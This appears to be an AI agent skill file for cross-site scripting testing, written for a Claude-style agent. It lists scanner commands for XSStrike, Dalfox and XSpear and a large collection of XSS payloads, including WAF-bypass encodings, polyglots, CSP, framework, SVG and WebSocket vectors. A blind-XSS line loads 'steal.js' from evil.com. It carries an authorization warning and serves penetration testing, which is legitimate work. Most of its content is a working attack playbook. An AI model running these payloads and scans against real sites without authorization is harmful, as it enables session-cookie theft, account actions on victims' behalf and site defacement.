0X6C7879/exploit-xss

Cross-Site Scripting (XSS) Detection Skill

⚠️ DANGER - Authorization Required

This skill is for AUTHORIZED SECURITY TESTING ONLY.

You must have:

• Written permission from the target system owner
• Legal authorization to test the target
• A defined scope of testing

Unauthorized XSS testing is ILLEGAL and unethical.

---

Prerequisites

Required Tools

# XSStrike - Advanced XSS scanner with DOM support
pip install xsstrike
# Or: git clone https://github.com/s0md3v/XSStrike

# Dalfox - Fast XSS scanner with pipeline mode
go install github.com/hahwul/dalfox/v2@latest

# XSpear - XSS testing with WAF bypass
gem install xspear

Python Requirements

# Install required Python packages for built-in scripts
pip install requests beautifulsoup4

# Optional: WebSocket XSS testing
pip install websockets

Optional Tools

# Burp Suite for manual testing
# OWASP ZAP for automated scanning

---

Quick Start

Basic URL Testing

# Test a URL parameter for XSS
python xsstrike.py -u "https://target.com/search?q=test"

# Fast scanning with Dalfox
dalfox url "https://target.com/search?q=test"

POST Request Testing

# Save POST request to file
dalfox file request.txt

# Or use XSStrike
python xsstrike.py -r request.txt

DOM XSS Testing

# DOM XSS with XSStrike
python xsstrike.py -u "https://target.com/page#test" --dom

# DOM XSS with Dalfox
dalfox url "https://target.com/page#test" --dom

---

Common Scenarios

1. Basic Parameter Testing (Reflected XSS)

Test URL parameters for reflection and injection:

# Single URL testing
python xsstrike.py -u "https://target.com/search?q=test"

# Dalfox for faster scanning
dalfox url "https://target.com/search?q=test"

# Specify parameter
dalfox url "https://target.com/search" -p q

What to check:

• Does the input reflect in the HTML response?
• What is the context (HTML tag, attribute, JavaScript)?
• Are there any filters/encoding applied?

2. POST Request XSS (Form Testing)

Test POST forms for stored/reflected XSS:

# Save request to file first
echo 'POST /login HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

username=test&password=test' > post_request.txt

# Test with XSStrike
python xsstrike.py -r post_request.txt

# Test with Dalfox
dalfox file post_request.txt

Common POST targets:

• Login forms (username, email fields)
• Contact forms (name, message fields)
• Search forms
• Comment forms
• User profile updates

3. Cookie and Header XSS

Test HTTP headers and cookies for injection:

# Test with custom cookies
python xsstrike.py -u "https://target.com" --cookie "session=test&user=<script>alert(1)</script>"

# Test User-Agent header
python xsstrike.py -u "https://target.com" --user-agent "<script>alert(1)</script>"

# Test Referer header (often reflects in error pages)
python xsstrike.py -u "https://target.com" --referer "https://evil.com/<script>alert(1)</script>"

Headers to test:

• User-Agent (check application logs/error pages)
• Referer (check 404 pages, analytics)
• X-Forwarded-For (check IP reflection)
• Cookie (check welcome messages/logs)

4. Reflected XSS Detection

Identify reflection points and test payloads:

# Automated reflection detection
dalfox url "https://target.com/search?q=test" --only-discovery

# Manual reflection analysis
scripts/xss_context_analyzer.py "https://target.com/search?q=test"

# Differential response analysis
python xsstrike.py -u "https://target.com/search?q=test" --blind

Detection techniques:

• Compare response length with/without payload
• Search for payload in response HTML
• Check for encoding/filtering patterns
• Identify HTML context (tag, attribute, JS, CSS)

5. Stored XSS Testing (Database Persistence)

Test for XSS that persists in the database:

# Test comment/feedback forms
dalfox file post_request.txt --blind https://your-callback.burpcollaborator.net

# Test user profile fields
python xsstrike.py -r profile_update_request.txt

# Time-based detection for stored XSS
scripts/blind_xss_tester.py --url "https://target.com/contact" --form-data "name=test&[email protected]&message=payload"

Stored XSS targets:

• User profiles (name, bio, location)
• Comments/Reviews
• Forum posts
• Email/contact forms (admin panel XSS)
• File upload metadata

6. DOM XSS Discovery

Find client-side XSS vulnerabilities:

# DOM XSS scanning
python xsstrike.py -u "https://target.com/page#input" --dom

# Dalfox DOM mode
dalfox url "https://target.com/page#input" --dom

# Manual DOM source analysis
scripts/xss_context_analyzer.py --dom "https://target.com/page"

Common DOM sources:

• location.hash
• location.search
• document.cookie
• document.referrer
• window.name

Common DOM sinks:

• innerHTML
• document.write()
• eval()
• location.href
• setTimeout() / setInterval()

7. Blind XSS in Forms (Contact/Admin XSS)

Test XSS in forms that execute in admin panels:

# Generate blind XSS payloads with callback
scripts/xss_payload_generator.py --blind --callback "https://your-callback.com"

# Test contact form with blind payload
dalfox file contact_request.txt --blind https://your-callback.burpcollaborator.net

# XSpear blind mode
xspear -u "https://target.com/contact" -d "name=test&message=<script src=https://evil.com/steal.js></script>"

Blind XSS testing tips:

• Use unique payloads per test (to identify which parameter is vulnerable)
• Use Burp Collaborator or interactsh for callbacks
• Test email contact forms (executes when admin opens email)
• Test support ticket systems

8. Context-Aware Payloads

Use payloads specific to the injection context:

# Analyze context first
scripts/xss_context_analyzer.py "https://target.com/search?q=test"

# Generate context-specific payloads
scripts/xss_payload_generator.py --context html-attribute
scripts/xss_payload_generator.py --context javascript
scripts/xss_payload_generator.py --context url

Context-specific payloads:

HTML Body/Tag:

<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>

HTML Attribute:

" onmouseover=alert('XSS')
javascript:alert('XSS')

JavaScript:

';alert('XSS');//
'-alert('XSS')-
</script><script>alert('XSS')</script>

CSS/Style:

</style><script>alert('XSS')</script>
expression(alert('XSS'))

9. WAF Bypass Techniques

Evade Web Application Firewalls:

# Generate WAF bypass payloads
scripts/xss_payload_generator.py --waf-bypass

# Use XSpear with bypass mode
xspear -u "https://target.com/search?q=test" --bypass

# Test various encodings
python xsstrike.py -u "https://target.com/search?q=test" --encode

Bypass techniques:

• URL encoding: %3Cscript%3Ealert(1)%3C/script%3E
• Double encoding: %253Cscript%253E
• Unicode encoding: \u003Cscript\u003E
• HTML entities: <script>alert(1)</script>
• Case mixing: <ScRiPt>alert(1)</sCrIpT>
• Comment injection: <script><!-- anything -->alert(1)</script>
• Tab/newline injection: <script\t>alert(1)</script>

10. Automated Scanning (Batch Testing)

Scan multiple URLs/parameters:

# Scan from file
dalfox file urls.txt

# Pipe from other tools
cat urls.txt | dalfox pipe

# XSStrike with multiple targets
for url in $(cat urls.txt); do python xsstrike.py -u "$url"; done

# Combine with subdomain enumeration
subfinder example.com | httpx | dalfox pipe

11. Payload Encoding Variations

Test with different encoding schemes:

# URL encode payloads
scripts/xss_payload_generator.py --encode url

# HTML encode
scripts/xss_payload_generator.py --encode html

# Hex encode
scripts/xss_payload_generator.py --encode hex

# Test with XSStrike encoding
python xsstrike.py -u "https://target.com" --encode

Common encodings to test:

1. Plain: <script>alert(1)</script>
2. URL encoded: %3Cscript%3Ealert(1)%3C/script%3E
3. Double URL encoded: %253Cscript%253E
4. HTML entities: <script>alert(1)</script>
5. Hex: \x3Cscript\x3Ealert(1)\x3C/script\x3E
6. Unicode: \u003Cscript\u003Ealert(1)\u003C/script\u003E

12. Polyglot Payloads

Test with payloads that work in multiple contexts:

# Generate polyglot payloads
scripts/xss_payload_generator.py --polyglot

# Common polyglot payload
# Works in: HTML, HTML attribute, JavaScript string, etc.
javascript://%250Aalert(1)//%250A?javascript://alert(1)//%0A

Famous polyglot payloads:

# Ashar Javed's polyglot
%3Cscript%3Ealert(1)%3C/script%3E

# Mathias Karlsson's polyglot
javascript://%250Aalert(1)//%250A?javascript://alert(1)//%0A

# Another polyglot
%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E

13. CSP Detection and Bypass

Content Security Policy analysis and bypass testing:

# Detect and analyze CSP
python scripts/csp_detector.py https://target.com

# Generate bypass report
python scripts/csp_detector.py https://target.com --bypass

# Full CSP analysis
python scripts/csp_detector.py https://target.com --verbose

Common CSP bypass techniques:

• unsafe-inline - allows inline scripts
• unsafe-eval - allows eval(), setTimeout()
• data: URLs - inline scripts via data URI
• Wildcard sources - allows any domain
• Nonce-based bypasses
• Framework-specific bypasses

See references/csp_bypass_guide.md for detailed techniques.

14. Framework-Specific XSS

Test for Angular, React, Vue, and other framework vulnerabilities:

# Auto-detect frameworks
python scripts/framework_xss_tester.py --url https://target.com --detect

# Test Angular XSS
python scripts/framework_xss_tester.py --url https://target.com --param q --framework angular

# Test React XSS
python scripts/framework_xss_tester.py --url https://target.com --param data --framework react

# Test Vue XSS
python scripts/framework_xss_tester.py --url https://target.com --param content --framework vue

Common framework vectors:

• Angular: {{constructor.constructor('alert(1)')()}}
• React: dangerouslySetInnerHTML
• Vue: v-html directive
• jQuery: .html() manipulation

See references/framework_xss_guide.md for detailed techniques.

15. SVG File Upload XSS

Test for SVG-based XSS in file uploads:

# Generate SVG payloads
python scripts/svg_xss_tester.py --generate --variant file_upload

# Test SVG injection
python scripts/svg_xss_tester.py --url https://target.com --param content

# Test SVG file upload
python scripts/svg_xss_tester.py --upload-url https://target.com/upload --file-param avatar

# Create exploit SVG
python scripts/svg_xss_tester.py --save-svg exploit.svg --callback https://your-callback.com

SVG XSS vectors:

• <svg onload="alert('XSS')">
• <svg><script>alert('XSS')</script></svg>
• <svg><foreignObject><iframe src="javascript:alert('XSS')"></iframe></foreignObject></svg>

See references/svg_xss_guide.md for detailed techniques.

16. Mutation XSS (mXSS)

Test for HTML mutation-based XSS:

# Test all mutation types
python scripts/mutation_xss_tester.py --url https://target.com --param q --type all

# Test DOM clobbering
python scripts/mutation_xss_tester.py --url https://target.com --param q --dom-clobber

# Test attribute mutations
python scripts/mutation_xss_tester.py --url https://target.com --param q --attribute

Mutation XSS vectors:

• Entity decoding mutations: < → <
• Tag parsing mutations: <xmp>, <listing>
• DOM clobbering: <a id="location">
• Namespace mutations: SVG/MathML

See references/mutation_xss_guide.md for detailed techniques.

17. WebSocket XSS

Test for XSS vulnerabilities in WebSocket connections:

# Scan URL for WebSocket endpoints
python scripts/websocket_xss_tester.py --url https://target.com

# Test specific WebSocket URL
python scripts/websocket_xss_tester.py --ws-url wss://target.com/ws

# Test DOM injection via WebSocket
python scripts/websocket_xss_tester.py --ws-url wss://target.com/ws --test-dom

# Test stored XSS in WebSocket
python scripts/websocket_xss_tester.py --ws-url wss://target.com/ws --test-stored

# Test with custom payload
python scripts/websocket_xss_tester.py --ws-url wss://target.com/ws --payload '<script>alert(1)</script>'

WebSocket XSS vectors:

• Message reflection: ws.send('<script>alert(1)</script>')
• JSON injection: {"message": "<img src=x onerror=alert(1)>"}
• Event handler: ws.send('alert(1);')
• Attribute breaking: " onmouseover=alert(1)

See references/websocket_xss_guide.md for detailed techniques.

---

Tool Selection Guide

| Scenario | Recommended Tool | Command | |----------|------------------|---------| | Quick parameter testing | Dalfox | dalfox url "https://target.com?param=test" | | Deep scanning with DOM | XSStrike | python xsstrike.py -u "URL" --dom | | WAF bypass testing | XSpear | xspear -u "URL" --bypass | | Stored/Blind XSS | Dalfox + Callback | dalfox file req.txt --blind CALLBACK | | Manual testing | XSStrike | python xsstrike.py -r request.txt | | Batch scanning | Dalfox pipe | cat urls.txt \| dalfox pipe | | CSP Analysis | CSP Detector | python scripts/csp_detector.py URL | | Framework XSS | Framework Tester | python scripts/framework_xss_tester.py -u URL -p param | | SVG XSS | SVG Tester | python scripts/svg_xss_tester.py -u URL -p param | | Mutation XSS | Mutation Tester | python scripts/mutation_xss_tester.py -u URL -p param | | WebSocket XSS | WebSocket Tester | python scripts/websocket_xss_tester.py -u URL | | Full Scan | Full Scanner | python scripts/xss_full_scan.py -u URL --all |

Tool Comparison:

| Feature | XSStrike | Dalfox | XSpear | Built-in Scripts | |---------|----------|--------|--------|------------------| | Speed | Medium | Fast | Medium | Varies | | DOM XSS | Excellent | Good | Limited | Good | | WAF Bypass | Good | Good | Excellent | Good | | Pipeline Mode | No | Yes | No | No | | Blind XSS | Yes | Yes | Yes | Yes | | CSP Analysis | No | No | No | Yes | | Framework Testing | No | No | No | Yes | | SVG Testing | No | No | No | Yes | | Mutation XSS | No | No | No | Yes | | WebSocket XSS | No | No | No | Yes |

---

Testing Checklist

Reconnaissance Phase

• [ ] Identify all input points (URL params, forms, headers, cookies)
• [ ] Map out application functionality
• [ ] Identify data storage locations

Reflected XSS Testing

• [ ] Test all URL parameters
• [ ] Test all form fields (GET/POST)
• [ ] Test HTTP headers (UA, Referer, Cookie)
• [ ] Identify reflection context
• [ ] Test context-specific payloads

Stored XSS Testing

• [ ] Test all form submissions
• [ ] Test file upload metadata
• [ ] Test user profile fields
• [ ] Test comments/reviews
• [ ] Verify persistence across sessions
• [ ] Test execution in different user contexts

DOM XSS Testing

• [ ] Identify all DOM sources
• [ ] Trace data flow to sinks
• [ ] Test hash-based injections
• [ ] Test URL parameter-based injections
• [ ] Test localStorage/sessionStorage

Advanced Testing

• [ ] Test WAF bypass techniques
• [ ] Test encoding variations
• [ ] Test polyglot payloads
• [ ] Perform blind XSS testing
• [ ] Test for CSP bypasses
• [ ] Test framework-specific XSS (Angular/React/Vue)
• [ ] Test SVG file upload XSS
• [ ] Test Mutation XSS (DOM clobbering)
• [ ] Test HTTP response header injection
• [ ] Test WebSocket XSS (if applicable)

---

Scenario: Persistent Storage of XSS Findings

When you need to persist XSS findings to the database:

# Manual entry after discovering XSS
python .claude/skills/exploit-xss/scripts/xss_storage.py \
  --host-ip 192.168.1.100 \
  --url "https://example.com/search?q=test" \
  --xss-type reflected \
  --payload "<script>alert(1)</script>" \
  --context html_body \
  --severity High \
  --subsystem "Web Application"

Parameters:

• --host-ip - Target host IP (required)
• --url - Vulnerable URL (required)
• --xss-type - XSS type: reflected, stored, or dom (required)
• --payload - Payload used (required)
• --context - XSS context: html_body, html_attribute, javascript, dom, url (default: html_body)
• --severity - Severity level (default: Medium)
• --subsystem - Subsystem name (optional)
• --parameter - Vulnerable parameter name
• --title - Vulnerability title (auto-generated if not specified)
• --description - Vulnerability description
• --cvss-score - CVSS score (0.0-10.0)

Database location: ./data/results.db

Related skills: results-storage - Query data, generate reports

---

Resources

Scripts

• scripts/xss_payload_generator.py - Generate XSS payloads for various contexts
• scripts/xss_tester.py - Automated XSS testing framework
• scripts/xss_context_analyzer.py - Analyze injection context
• scripts/blind_xss_tester.py - Test stored/blind XSS
• scripts/csp_detector.py - CSP analysis and bypass testing
• scripts/svg_xss_tester.py - SVG file upload XSS testing
• scripts/framework_xss_tester.py - Angular/React/Vue XSS testing
• scripts/mutation_xss_tester.py - Mutation XSS/DOM clobbering testing
• scripts/websocket_xss_tester.py - WebSocket XSS testing
• scripts/mxss_detector.py - HTML parser mutation XSS detection
• scripts/xss_full_scan.py - Integrated XSS testing automation

Reference Documentation

• references/dalfox_guide.md - Dalfox complete guide
• references/xsstrike_guide.md - XSStrike complete guide
• references/xspear_guide.md - XSpear complete guide
• references/xss_payload_techniques.md - XSS payload techniques
• references/dom_xss_guide.md - DOM XSS testing guide
• references/csp_bypass_guide.md - CSP bypass techniques
• references/framework_xss_guide.md - Framework-specific XSS guide
• references/svg_xss_guide.md - SVG XSS testing guide
• references/mutation_xss_guide.md - Mutation XSS/DOM clobbering guide
• references/websocket_xss_guide.md - WebSocket XSS testing guide

Assets/Wordlists

• assets/common_xss_payloads.txt - Basic XSS payloads
• assets/attribute_xss_payloads.txt - Attribute context payloads
• assets/dom_xss_payloads.txt - DOM XSS payloads
• assets/blind_xss_payloads.txt - Blind XSS with callbacks
• assets/polyglot_xss_payloads.txt - Multi-context payloads
• assets/waf_bypass_payloads.txt - WAF evasion payloads
• assets/csp_bypass_payloads.txt - CSP bypass payloads
• assets/framework_xss_payloads.txt - Angular/React/Vue payloads
• assets/svg_xss_payloads.txt - SVG XSS payloads
• assets/mutation_xss_payloads.txt - Mutation XSS payloads
• assets/websocket_xss_payloads.txt - WebSocket XSS payloads

External Resources

• OWASP XSS Prevention Cheat Sheet
• PortSwigger XSS Guide
• PayloadsAllTheThings - XSS

---

Common Responses & Troubleshooting

"No XSS found"

• Try different payload encodings
• Test with DOM scanner enabled
• Check if there's a WAF blocking
• Test with blind XSS payloads
• Verify the parameter actually reflects

"Payload is reflected but not executing"

• Analyze the context using context analyzer
• Use context-specific payloads
• Check for CSP (Content Security Policy)
• Check for input sanitization
• Try alternative tags/event handlers

"403 / WAF blocked"

• Use WAF bypass payloads
• Try different encoding methods
• Use XSpear with --bypass flag
• Test with smaller payloads first
• Try alternative injection points

---

Reporting Format

When reporting XSS vulnerabilities, include:

╔═══════════════════════════════════════════════════════╗
║              XSS Vulnerability Report                 ║
╠═══════════════════════════════════════════════════════╣
║ Target: https://target.com/search                     ║
║ Type: Reflected XSS                                   ║
║ Severity: High                                        ║
╚═══════════════════════════════════════════════════════╝

Vulnerable Parameter: q
Injection Context: HTML attribute (value)
Payload: " onmouseover=alert('XSS')

Proof of Concept:
https://target.com/search?q=%22%20onmouseover%3Dalert('XSS')

Impact:
- Execute arbitrary JavaScript in victim's browser
- Steal session cookies
- Perform actions on behalf of victim
- Deface website

Recommendations:
- Implement proper output encoding
- Use Content Security Policy (CSP)
- Validate and sanitize all input
- Use framework-provided escaping functions